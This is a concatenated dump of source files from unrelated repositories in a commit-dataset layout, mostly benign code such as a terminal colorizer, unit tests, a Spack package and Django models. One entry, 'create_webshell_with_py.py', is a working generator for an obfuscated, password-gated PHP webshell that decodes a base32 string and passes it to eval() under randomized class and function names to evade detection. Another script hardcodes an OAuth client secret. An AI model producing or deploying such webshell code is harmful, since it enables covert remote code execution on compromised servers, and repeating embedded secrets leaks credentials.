    'yellow'  : Fore.YELLOW,
    'blue'    : Fore.BLUE,
    'magenta' : Fore.MAGENTA,
    'cyan'    : Fore.CYAN,
    'white'   : Fore.WHITE,

    'on_black'   : Back.BLACK,
    'on_red'     : Back.RED,
    'on_green'   : Back.GREEN,
    'on_yellow'  : Back.YELLOW,
    'on_blue'    : Back.BLUE,
    'on_magenta' : Back.MAGENTA,
    'on_cyan'    : Back.CYAN,
    'on_white'   : Back.WHITE,
}

# Matches "<foreground>" optionally followed by " on <background>".
COLOR_MATCHER = re.compile(r"(\w+)(\W+on\W+\w+)?")
def colorstring_to_escapecode(color_string):
    """ Convert a color string from a string into an ascii escape code that
    will print that color on the terminal.

    Positional arguments:
    color_string - the string to parse
    """
    match = re.match(COLOR_MATCHER, color_string)
    if not match:
        return COLORS['default']
    escape = COLORS[match.group(1)]
    background = match.group(2)
    if background:
        escape += COLORS[background.strip().replace(" ", "_")]
    return escape
def print_in_color_notifier(color_map, print_fn):
    """ Wrap a toolchain notifier in a colorizer. This colorizer will wrap
    notifications in a color if the severity matches a color in the *color_map*.
    """
    def wrap(event, silent=False):
        """The notification function itself"""
        file_desc = sys.stdout
        self = event['toolchain']
        # Only colorize when writing to a real terminal and the event's
        # severity has a mapped color.
        if file_desc.isatty() and 'severity' in event and \
           event['severity'] in color_map:
            file_desc.write(colorstring_to_escapecode(
                color_map[event['severity']]))
            print_fn(self, event, silent)
            # Always restore the default color afterwards.
            file_desc.write(colorstring_to_escapecode('default'))
        else:
            print_fn(self, event, silent)
    return wrap
|
"""
mbed SDK
Copyright (c) 2016 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
""" This python file is responsible for generating colorized notifiers.
"""
import sys
import re
from colorama import init, Fore, Back, Style
# Hook colorama's Win32 translation into stdout/stderr.
init()

# Map color names (and 'on_*' background variants) to colorama escapes.
colors = {
    'none' : "",
    'default' : Style.RESET_ALL,

    'black'   : Fore.BLACK,
    'red'     : Fore.RED,
    'green'   : Fore.GREEN,
    'yellow'  : Fore.YELLOW,
    'blue'    : Fore.BLUE,
    'magenta' : Fore.MAGENTA,
    'cyan'    : Fore.CYAN,
    'white'   : Fore.WHITE,

    'on_black'   : Back.BLACK,
    'on_red'     : Back.RED,
    'on_green'   : Back.GREEN,
    'on_yellow'  : Back.YELLOW,
    'on_blue'    : Back.BLUE,
    'on_magenta' : Back.MAGENTA,
    'on_cyan'    : Back.CYAN,
    'on_white'   : Back.WHITE,
}

# Convert a color string from a string into an ascii escape code that will print
# that color on the terminal.
color_matcher = re.compile(r"(\w+)(\W+on\W+\w+)?")
def colorstring_to_escapecode(color_string):
    """Convert a color string such as "red on white" into the escape code
    that prints that color on the terminal; unknown strings reset to the
    default style."""
    match = re.match(color_matcher, color_string)
    if match:
        return colors[match.group(1)] + (colors[match.group(2).strip().replace(" ", "_")] if match.group(2) else "")
    else:
        # BUG FIX: this previously read ``corols['default']`` -- a
        # NameError on any color string the regex does not match.
        return colors['default']
# Wrap a toolchain notifier in a colorizer. This colorizer will wrap notifications
# in a color if the severity matches a color in the *color_map*.
def print_in_color_notifier (color_map, print_fn):

    def wrap(event, silent=False):
        fd = sys.stdout
        self = event['toolchain']
        # Only colorize on a real terminal when the event's severity has a
        # mapped color; always reset to default afterwards.
        if fd.isatty() and 'severity' in event and event['severity'] in color_map:
            fd.write(colorstring_to_escapecode(color_map[event['severity']]))
            print_fn(self, event, silent)
            fd.write(colorstring_to_escapecode('default'))
        else:
            print_fn(self, event, silent)
    return wrap
|
apache-2.0
|
Python
|
d3c6845e83514f59f421d042cab9cf8fa817e33c
|
Add tests for common.signal.SignalCompare
|
ARM-software/bart
|
tests/test_signal.py
|
tests/test_signal.py
|
# Copyright 2015-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pandas as pd
import trappy
from utils_tests import TestBART
from bart.common.signal import SignalCompare
class TestSignalCompare(TestBART):

    def __init__(self, *args, **kwargs):
        super(TestSignalCompare, self).__init__(*args, **kwargs)

    def test_conditional_compare(self):
        """Test conditional_compare"""
        # Two synthetic signals on a shared 8-sample index.
        A = [0, 0, 0, 3, 3, 0, 0, 0]
        B = [0, 0, 2, 2, 2, 2, 1, 1]

        run = trappy.Run(".", events=["event"])
        df = pd.DataFrame({"A": A, "B": B})
        # Replace the parsed trace data with the synthetic frame.
        run.event.data_frame = df
        s = SignalCompare(run, "event:A", "event:B")
        # Expected (value, duration-fraction) pair for the region where
        # A > B -- see SignalCompare.conditional_compare for semantics.
        expected = (1.5, 2.0 / 7)
        self.assertEqual(
            s.conditional_compare(
                "event:A > event:B",
                method="rect"),
            expected)
|
apache-2.0
|
Python
|
|
f91d32d25bc84a795d53f2f7698b77862d08f690
|
Add a test_traits file
|
frostidaho/dynmen
|
tests/test_traits.py
|
tests/test_traits.py
|
# -*- coding: utf-8 -*-
from dynmen import common
import unittest
class TestFlag(unittest.TestCase):
    """Exercise common.Flag descriptors with True and False defaults."""

    @classmethod
    def setUpClass(cls):
        # A host class carrying one flag defaulting on and one off.
        class TFlag(object):
            dflt_t = common.Flag('dflt_t', default=True, flag='-dt')
            dflt_f = common.Flag('dflt_f', default=False, flag='-df')
        cls.TFlag = TFlag

    def setUp(self):
        self.tflag = self.TFlag()

    def test_dflt_true(self):
        self.assertEqual(self.tflag.dflt_t, '-dt')
        self.tflag.dflt_t = False
        # BUG FIX: the original ended with ``self.assertFalse('')`` which
        # is vacuously true; actually verify the flag now renders empty,
        # mirroring test_dflt_false below.
        self.assertEqual(self.tflag.dflt_t, '')

    def test_dflt_false(self):
        self.assertEqual(self.tflag.dflt_f, '')
        self.tflag.dflt_f = True
        self.assertEqual(self.tflag.dflt_f, '-df')

    def test_validation(self):
        # Flags only accept booleans; anything else must raise TypeError.
        with self.assertRaises(TypeError):
            self.tflag.dflt_f = 37
        with self.assertRaises(TypeError):
            self.tflag.dflt_t = 'asdfasdf'
|
mit
|
Python
|
|
8e7784759515a2ffa88c43b85695087fff6d9c8c
|
add create_webshell_with_py.py @pureqh :💯
|
hillwah/webshell,hillwah/webshell,360sec/webshell,tennc/webshell,tennc/webshell,hillwah/webshell,tennc/webshell,360sec/webshell,tennc/webshell,tennc/webshell,360sec/webshell,360sec/webshell,tennc/webshell,hillwah/webshell,360sec/webshell,hillwah/webshell,hillwah/webshell,360sec/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,hillwah/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,360sec/webshell,hillwah/webshell,tennc/webshell,tennc/webshell,360sec/webshell
|
php/create_webshell_with_py.py
|
php/create_webshell_with_py.py
|
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
|
mit
|
Python
|
|
34b7d99becd1664c1a5881da178fb4ae8b871bee
|
Add new package: mahout (#18048)
|
LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,LLNL/spack,iulian787/spack,LLNL/spack,LLNL/spack,iulian787/spack,iulian787/spack
|
var/spack/repos/builtin/packages/mahout/package.py
|
var/spack/repos/builtin/packages/mahout/package.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Mahout(Package):
    """The Apache Mahout project's goal is to build an environment for
    quickly creating scalable performant machine learning applications."""

    homepage = "https://mahout.apache.org/"
    url = "https://archive.apache.org/dist/mahout/0.13.0/apache-mahout-distribution-0.13.0-src.tar.gz"
    # Spack scans one directory level below list_url to discover versions.
    list_url = "https://archive.apache.org/dist/mahout"
    list_depth = 1

    version('0.13.0', sha256='bbe5a584fa83eb4ea3e0c146256e3e913c225426434759458d1423508da7c519')
    version('0.12.2', sha256='cac9a3fd4f11b2cb850b86d1bd23aec90e960cfae91850c49056c2eaae71afba')
    version('0.12.1', sha256='32e334115e4b2bfa21ba58e888fc47cdde2ca32c915d1694ed6761bda3b05dbb')
    version('0.12.0', sha256='65f340072131b1178b7bf4da115782254bdb20d6abd9789f10fc6dfe1ea7e7ad')

    depends_on('maven', type='build')  # build tool only
    depends_on('java@8', type=('build', 'run'))  # needed at build time and runtime

    def install(self, spec, prefix):
        # Build with Maven (tests skipped for speed) and copy the whole
        # build tree into the installation prefix.
        mvn = which('mvn')
        mvn('package', '-DskipTests')
        install_tree('.', prefix)
|
lgpl-2.1
|
Python
|
|
3867db9e3c2107deae0c2b3e7f8ba3461bb550b2
|
Add test case to check invalid time_start (#558)
|
interuss/dss,interuss/dss,interuss/dss,interuss/dss
|
monitoring/prober/scd/test_subscription_query_time.py
|
monitoring/prober/scd/test_subscription_query_time.py
|
"""Strategic conflict detection Subscription put query tests:
- query with different time formats.
"""
import datetime
from monitoring.monitorlib.infrastructure import default_scope
from monitoring.monitorlib import scd
from monitoring.monitorlib.scd import SCOPE_SC
from monitoring.prober.infrastructure import for_api_versions
BASE_URL = 'https://example.com/uss'
SUB_ID = '00000088-b268-481c-a32d-6be442000000'
def _make_sub_req(time_start, time_end, alt_start, alt_end, radius, scd_api):
    """Build a subscription PUT request body for the given 4D volume.

    The notification field name differs between API versions, so it is
    filled in according to *scd_api*.
    """
    volume = scd.make_vol4(time_start, time_end, alt_start, alt_end,
                           scd.make_circle(-56, 178, radius))
    req = {
        "extents": volume,
        "old_version": 0,
        "uss_base_url": BASE_URL,
        "notify_for_constraints": False,
    }
    if scd_api == scd.API_0_3_5:
        req["notify_for_operations"] = True
    elif scd_api == scd.API_0_3_15:
        req["notify_for_operational_intents"] = True
    return req
@for_api_versions(scd.API_0_3_5, scd.API_0_3_15)
@default_scope(SCOPE_SC)
def test_subscription_with_invalid_start_time(scd_api, scd_session):
    """A PUT /subscriptions request with a malformed time_start must get HTTP 400."""
    if scd_session is None:
        return
    # Build an otherwise-valid 2.5-hour subscription request...
    time_start = datetime.datetime.utcnow()
    time_end = time_start + datetime.timedelta(hours=2.5)
    req = _make_sub_req(time_start, time_end, 200, 1000, 500, scd_api)
    # ...then corrupt the start-time value so the server must reject it.
    req['extents']['time_start']['value'] = 'something-invalid'
    resp = scd_session.put('/subscriptions/{}'.format(SUB_ID), json=req)
    assert resp.status_code == 400, resp.content
|
apache-2.0
|
Python
|
|
32fb5d7d98c112bf9a358339931f2708114fd56b
|
fix commentary of DimensionKey in questions.models in API for sphinx
|
hds-lab/textvisdrg,hds-lab/textvisdrg,hds-lab/textvisdrg,hds-lab/textvisdrg,hds-lab/textvisdrg
|
msgvis/apps/questions/models.py
|
msgvis/apps/questions/models.py
|
from django.db import models
from msgvis.apps.dimensions import registry
from django.db.models import Q
class Article(models.Model):
    """
    A published research article.

    Every field is optional so partially-known citations can be stored.
    """
    year = models.PositiveIntegerField(null=True, default=None, blank=True)
    """The publication year for the article."""

    authors = models.CharField(max_length=250, default=None, blank=True)
    """A plain-text author list."""

    link = models.CharField(max_length=250, default=None, blank=True)
    """A url to the article."""

    title = models.CharField(max_length=250, default=None, blank=True)
    """The title of the article."""

    venue = models.CharField(max_length=250, default=None, blank=True)
    """The venue where the article was published."""
class Question(models.Model):
    """
    A research question from an :class:`Article`.
    May be associated with a number of :class:`.DimensionKey` objects.
    """
    source = models.ForeignKey(Article, null=True, default=None)
    """The source article for the question."""

    text = models.TextField()
    """The text of the question."""

    dimensions = models.ManyToManyField("dimensions.DimensionKey")
    """A set of dimensions related to the question."""

    @staticmethod
    def get_dimension_key_model(key):
        """Resolve a dimension *key* to its DimensionKey model via the registry."""
        return registry.get_dimension(key).get_key_model()

    def add_dimension(self, key):
        """Associate the dimension identified by *key* with this question."""
        self.dimensions.add(self.get_dimension_key_model(key))
self.dimensions.add(self.get_dimension_key_model(key))
def get_sample_questions(dimension_list):
    """
    Given dimensions, return sample research questions.

    Returns at most 10 questions tagged with *every* dimension in
    dimension_list; if none match, falls back to an unfiltered sample.
    """
    # Narrow the queryset by chaining one filter per requested dimension.
    questions = Question.objects.all()
    for dimension in dimension_list:
        questions = questions.filter(dimensions__key=dimension)
    if questions.count() == 0:
        questions = Question.objects.all()
        """Consider the case that no dimension in the existing questions matches"""
        #TODO: may need a better way to handle this
    return questions[:10]
|
from django.db import models
from msgvis.apps.dimensions import registry
from django.db.models import Q
class Article(models.Model):
"""
A published research article.
"""
year = models.PositiveIntegerField(null=True, default=None, blank=True)
"""The publication year for the article."""
authors = models.CharField(max_length=250, default=None, blank=True)
"""A plain-text author list."""
link = models.CharField(max_length=250, default=None, blank=True)
"""A url to the article."""
title = models.CharField(max_length=250, default=None, blank=True)
"""The title of the article."""
venue = models.CharField(max_length=250, default=None, blank=True)
"""The venue where the article was published."""
class Question(models.Model):
"""
A research question from an :class:`Article`.
May be associated with a number of :class:`.Dimension` objects.
"""
source = models.ForeignKey(Article, null=True, default=None)
"""The source article for the question."""
text = models.TextField()
"""The text of the question."""
dimensions = models.ManyToManyField("dimensions.DimensionKey")
"""A set of dimensions related to the question."""
@staticmethod
def get_dimension_key_model(key):
return registry.get_dimension(key).get_key_model()
def add_dimension(self, key):
self.dimensions.add(self.get_dimension_key_model(key))
def get_sample_questions(dimension_list):
"""
Given dimensions, return sample research questions.
"""
questions = Question.objects.all()
for dimension in dimension_list:
questions = questions.filter(dimensions__key=dimension)
if questions.count() == 0:
questions = Question.objects.all()
"""Consider the case that no dimension in the existing questions matches"""
#TODO: may need a better way to handle this
return questions[:10]
|
mit
|
Python
|
ce3a61f640d37bfdb10a0862f9478153436de327
|
add script to generate a manifest file and upload dcc archives to GCS
|
isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc
|
data_upload/main/ISBCGCCreateSnapshotArchive.py
|
data_upload/main/ISBCGCCreateSnapshotArchive.py
|
'''
Created on Jun 29, 2016
Copyright 2016, Institute for Systems Biology.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: michael
'''
from datetime import date
import json
import logging
import os
import sys
import gcs_wrapper
from util import create_log
from oauth2client.client import OAuth2WebServerFlow
from oauth2client import tools
from oauth2client.file import Storage
def get_credentials():
    """Obtain (or refresh) OAuth2 user credentials for the ISB-CGC endpoints.

    Loads cached credentials from ~/.isb_credentials_dev; if absent or
    invalid, runs the OAuth2 web-server flow (printing a verification URL
    for the user to paste into a browser) and caches the result.

    Returns:
        An oauth2client Credentials object.
    """
    EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
    # Bug fix: the original had trailing commas here, which silently turned
    # CLIENT_ID and CLIENT_SECRET into one-element tuples before being
    # handed to OAuth2WebServerFlow.  They must be plain strings.
    CLIENT_ID = "907668440978-0ol0griu70qkeb6k3gnn2vipfa5mgl60.apps.googleusercontent.com"
    # NOTE(review): client secret committed to source -- consider moving it
    # to configuration or an environment variable.
    CLIENT_SECRET = "To_WJH7-1V-TofhNGcEqmEYi"
    STORAGE_FILE = ".isb_credentials_dev"

    # --noauth_local_webserver: print the auth URL instead of opening a browser.
    oauth_flow_args = ['--noauth_local_webserver']
    # where a default token file (based on the google project) will be stored for use by the endpoints
    DEFAULT_STORAGE_FILE = os.path.join(os.path.expanduser("~"), STORAGE_FILE)
    storage = Storage(DEFAULT_STORAGE_FILE)
    credentials = storage.get()
    if not credentials or credentials.invalid:
        # this will bring up a verification URL to paste in a browser
        flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, EMAIL_SCOPE)
        flow.auth_uri = flow.auth_uri.rstrip('/') + '?approval_prompt=force'
        credentials = tools.run_flow(flow, storage, tools.argparser.parse_args(oauth_flow_args))
    return credentials
def main(configfilename):
    """Create a 'latestarchive' manifest whose DCC links point into GCS.

    Reads a JSON config (for the log directory tag), opens a GCS connection,
    then copies the 07jun16 latestarchive file record by record, rewriting
    each DCC download URL to the matching Google Cloud Storage link.
    """
    try:
        # NOTE(review): machine-specific path -- parameterize before reuse.
        os.environ['BOTO_CONFIG'] = 'C:\\Users\\michael'
        get_credentials()
        with open(configfilename) as configFile:
            config = json.load(configFile)
        log_dir = str(date.today()).replace('-', '_') + '_' + config['log_dir_tag'] + '/'
        log_name = create_log(log_dir, 'create_snapshot')
        log = logging.getLogger(log_name)
        log.info('begin create snapshot')
        gcs_wrapper.open_connection()

        latestarchive07jun16path = '/titan/cancerregulome11/TCGA/repositories/dcc-mirror/datareports/resources/latestarchive_07jun16'
        latestarchivepath = 'latestarchive'
        snapshotprefix = '/titan/cancerregulome11/TCGA/repositories/dcc-mirror/public'
        # Length of the DCC URL prefix to strip from each archive link.
        dccprefixlen = len('https://tcga-data.nci.nih.gov/tcgafiles/ftp_auth/distro_ftpusers/anonymous')
        googlebucket = 'dcc_repository'
        googlefolderprefix = '2016_06_07/public'
        googlelinkprefix = 'https://console.cloud.google.com/m/cloudstorage/b/dcc_repository/o/2016_06_07/public'
        count = 0
        with open(latestarchive07jun16path) as latestarchive07jun16, open(latestarchivepath, 'w') as latestarchive:
            # copy the header
            latestarchive.write(latestarchive07jun16.readline())
            # Bug fix: the original looped over readline() -- i.e. over the
            # characters of a single line -- so only one record was ever
            # (mis)processed.  Iterate the remaining lines of the file.
            for line in latestarchive07jun16:
                fields = line.strip().split('\t')
                # translate the location in the dcc to the location in our mirror
                pathsuffix = fields[2][dccprefixlen:]
                fields[2] = googlelinkprefix + pathsuffix
                latestarchive.write('\t'.join(fields) + '\n')
                snapshotloc = snapshotprefix + pathsuffix
                uploadpath = 'gs://' + googlebucket + '/' + googlefolderprefix + pathsuffix
                if 0 == count % 100:
                    log.info('\t==================================\n\tgoogle path: %s\n\tgoogle link: %s\n\tsnapshot location: %s\n' % (uploadpath, fields[2], snapshotloc))
                count += 1
        log.info('finished create snapshot')
    finally:
        # NOTE(review): runs even if open_connection() itself failed --
        # confirm gcs_wrapper.close_connection() tolerates that.
        gcs_wrapper.close_connection()
if __name__ == '__main__':
main(sys.argv[1])
|
apache-2.0
|
Python
|
|
f1b8216408f26094a70789297198d2a63b0db0dd
|
Add pframe test.
|
mrhappyasthma/happydebugging,mrhappyasthma/HappyDebugging
|
tests/pframe_test.py
|
tests/pframe_test.py
|
"""Tests for scripts/pframe.py."""
import re
import unittest
from test_utils import import_utils
import_utils.prepare_lldb_import_or_exit()
import lldb
import_utils.prepare_for_scripts_imports()
from scripts import pframe
class PFrameTest(unittest.TestCase):
    """Integration test for the |pframe| LLDB command.

    Requires a running 'TestApp' process containing a view tagged 19 with a
    100x100 frame; attaches LLDB to it and checks pframe's printed geometry.
    """

    def __init__(self, *args, **kwargs):
        super(PFrameTest, self).__init__(*args, **kwargs)
        self.debugger = None
        self.target = None

    def tearDown(self):
        # Drop the target so repeated runs do not accumulate attachments.
        if self.debugger and self.target:
            self.debugger.DeleteTarget(self.target)

    def testPFrame(self):
        """Tests the expected output of the |pframe <instance>| command."""
        self.debugger = lldb.SBDebugger.Create()
        self.debugger.SetAsync(False)
        self.target = self.debugger.CreateTarget('')
        error = lldb.SBError()
        process = self.target.AttachToProcessWithName(self.debugger.GetListener(),
                                                      'TestApp', False, error)
        if not process:
            self.assertTrue(False, 'Could not attach to process "TestApp"')
        self.debugger.SetSelectedTarget(self.target)
        result = lldb.SBCommandReturnObject()
        # Get the test view, which has an arbitrary tag of 19.
        self.debugger.GetCommandInterpreter().HandleCommand(
            'po [[UIWindow keyWindow] viewWithTag:19]', result)
        self.assertTrue(result.Succeeded())
        output = result.GetOutput()
        # 'po' prints something like '<UIView: 0xADDR; frame = ...>'; slice
        # out the '0xADDR' token between '0x' and the first semicolon.
        start_index = output.find('0x')
        self.assertTrue(start_index != -1)
        end_index = output.find(';')
        self.assertTrue(end_index != -1)
        view = output[start_index:end_index]
        pframe.pframe(self.debugger, view, result, None)
        self.assertTrue(result.Succeeded())
        expected_output_regex = r'\(origin = \(x = 0, y = 0\), size = \(width = 100, height = 100\)\)'
        self.assertTrue(re.search(expected_output_regex, result.GetOutput(), re.M))
|
mit
|
Python
|
|
9524f44838df21f386b56d047e4a45e2aba9ad4e
|
Create Valid_Palindrome.py
|
UmassJin/Leetcode
|
Array/Valid_Palindrome.py
|
Array/Valid_Palindrome.py
|
Given a string, determine if it is a palindrome, considering only alphanumeric characters and ignoring cases.
For example,
"A man, a plan, a canal: Panama" is a palindrome.
"race a car" is not a palindrome.
Note:
Have you considered that the string might be empty? This is a good question to ask during an interview.
For the purpose of this problem, we define empty string as valid palindrome.
# 1. isalnum()
# 2. lower()
# 3. no need to check len at the begining
class Solution:
    # @param s, a string
    # @return a boolean
    def isPalindrome_1(self, s):
        """Palindrome check restricted to ASCII letters/digits, case-insensitive.

        Characters outside the hard-coded ASCII alphanumeric set are skipped.
        """
        if len(s) == 0:
            return True
        characters = 'abcdefghijklmnopqrstuvwxyz1234567890'
        # Keep only the recognised characters (lower-cased), then compare the
        # filtered sequence with its own reversal.
        kept = [ch for ch in s.lower() if ch in characters]
        return kept == kept[::-1]

    def isPalindrome(self, s):
        """Palindrome check over alphanumeric characters, ignoring case.

        Uses str.isalnum(), so Unicode letters and digits also count.
        """
        filtered = [ch.lower() for ch in s if ch.isalnum()]
        return filtered == filtered[::-1]
|
mit
|
Python
|
|
bffa61da4576c088c081daea3833142af58fef1d
|
Add in some tests for cities
|
jhesketh/pyconau-gating-demo
|
tests/test_cities.py
|
tests/test_cities.py
|
import testtools
import cities
class TestCities(testtools.TestCase):
    """Sanity checks for the cities helper module."""

    def test_largest(self):
        # Sydney is the largest city in the fixture data returned by
        # cities.get_cities().
        largest = 'Sydney'
        self.assertEqual(largest, cities.largest(cities.get_cities()).name)
|
apache-2.0
|
Python
|
|
91d24f62505462e5009cd5e0fb1176824d7c57d9
|
Test config
|
goldsborough/changes
|
tests/test_config.py
|
tests/test_config.py
|
from changes import config
from . import BaseTestCase
class ConfigTestCase(BaseTestCase):
    """Verifies that config.common_arguments() extracts the expected triple
    from a docopt-style argument dictionary."""

    # A representative docopt result: a patch release of 'changes' to
    # version 0.0.1, non-interactive, with debug logging.
    arguments = {
        '--debug': True,
        '--dry-run': False,
        '--help': False,
        '--major': False,
        '--minor': False,
        '--new-version': '0.0.1',
        'new_version': '0.0.1',
        '--noinput': True,
        '--patch': True,
        '--pypi': None,
        '--skip-changelog': False,
        '--test-command': None,
        '--tox': False,
        '--version-prefix': None,
        '<app_name>': 'changes',
        'bump_version': False,
        'changelog': True,
        'install': False,
        'pypi': False,
        'release': False,
        'tag': False,
        'test': False,
        'upload': False
    }

    def setUp(self):
        # Inject the fixture arguments into the module under test.
        config.arguments = self.arguments

    def test_common_arguments(self):
        # Expected: (app_name, dry_run flag, new version).
        expected_arguments = (
            'changes',
            False,
            '0.0.1',
        )
        self.assertEquals(
            expected_arguments,
            config.common_arguments()
        )
|
mit
|
Python
|
|
71fda989816e1848c99b801c133171216abe0df5
|
Add test for setting scheduler parameters
|
libvirt/libvirt-python,libvirt/libvirt-python,libvirt/libvirt-python
|
tests/test_domain.py
|
tests/test_domain.py
|
import unittest
import libvirt
class TestLibvirtDomain(unittest.TestCase):
    """Exercises the scheduler-parameter APIs against libvirt's built-in
    'test' driver, which provides a predictable 'test' domain."""

    def setUp(self):
        self.conn = libvirt.open("test:///default")
        self.dom = self.conn.lookupByName("test")

    def tearDown(self):
        # Drop references so the connection can be closed/collected.
        self.dom = None
        self.conn = None

    def testDomainSchedParams(self):
        """The test driver exposes exactly one parameter, 'weight', and it
        must accept being written back."""
        params = self.dom.schedulerParameters()
        # Fix: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(len(params), 1)
        self.assertTrue("weight" in params)
        params["weight"] = 100
        self.dom.setSchedulerParameters(params)
|
lgpl-2.1
|
Python
|
|
726ae01462c8945df1b7d3f32d56fc54ed9b6fa2
|
Write hub initialization tests
|
dashdotrobot/bike-wheel-calc
|
tests/test_bicycle_wheel.py
|
tests/test_bicycle_wheel.py
|
import pytest
from bikewheelcalc import BicycleWheel, Rim, Hub
# -------------------------------------------------------------------------------
# Test fixtures
#------------------------------------------------------------------------------
@pytest.fixture
def std_radial():
    """Return a standard bicycle wheel with radial spokes."""
    w = BicycleWheel()
    w.hub = Hub(diam1=0.050, width1=0.025)
    w.rim = Rim(radius=0.3, area=100e-6,
                I11=25., I22=200., I33=100., Iw=0.0,
                young_mod=69e9, shear_mod=26e9)
    w.lace_radial(n_spokes=36, diameter=1.8e-3, young_mod=210e9, offset=0.)
    # Bug fix: the fixture previously fell off the end and yielded None,
    # so every test using it received no wheel.
    return w
@pytest.fixture
def std_3cross():
    """Return a standard bicycle wheel with 3-cross spokes."""
    w = BicycleWheel()
    w.hub = Hub(diam1=0.050, width1=0.025)
    w.rim = Rim(radius=0.3, area=100e-6,
                I11=25., I22=200., I33=100., Iw=0.0,
                young_mod=69e9, shear_mod=26e9)
    w.lace_cross(n_spokes=36, n_cross=3, diameter=1.8e-3, young_mod=210e9, offset=0.)
    # Bug fix: the fixture previously fell off the end and yielded None,
    # so every test using it received no wheel.
    return w
# -----------------------------------------------------------------------------
# Hub tests
# -----------------------------------------------------------------------------
def test_hub_symm():
    """A symmetric hub built from a single diameter/width splits both evenly."""
    hub = Hub(diameter=0.05, width=0.05)
    assert (hub.width_left, hub.width_right) == (0.025, 0.025)
    assert (hub.diameter_left, hub.diameter_right) == (0.05, 0.05)
def test_hub_asymm():
    """Explicit per-side diameters and widths are stored unchanged."""
    hub = Hub(diameter_left=0.04, diameter_right=0.06, width_left=0.03, width_right=0.02)
    assert (hub.width_left, hub.width_right) == (0.03, 0.02)
    assert (hub.diameter_left, hub.diameter_right) == (0.04, 0.06)
def test_hub_asymm_offset():
    """An offset hub shifts the flange widths by +/- the offset."""
    h = Hub(diameter=0.05, width=0.05, offset=0.01)
    assert h.width_left == 0.035
    # Bug fix: the attribute name was misspelled 'widtH_right', so this
    # assertion raised AttributeError instead of checking the value.
    assert h.width_right == 0.015
|
mit
|
Python
|
|
d05a2a7504bf8e6adf6d5d94d0b810060f66a9ec
|
Create test_it_all.py
|
destruc7i0n/PyPixel
|
tests/test_it_all.py
|
tests/test_it_all.py
|
#soon TM
|
mit
|
Python
|
|
afe2cac782f2578e610137891566d862f62375c6
|
Create uds18.py
|
gbrammer/unicorn,gbrammer/unicorn,gbrammer/pygrism,gbrammer/pygrism
|
uds18.py
|
uds18.py
|
"""
Custom fits for the lens in UDS-18
"""
import unicorn
import pyfits
import emcee
|
mit
|
Python
|
|
df26dc408dc629e4802716ace5d0b3879c2b110b
|
Create factories.py
|
RonsenbergVI/trendpy,RonsenbergVI/trendpy
|
trendpy/factories.py
|
trendpy/factories.py
|
# factory.py
# MIT License
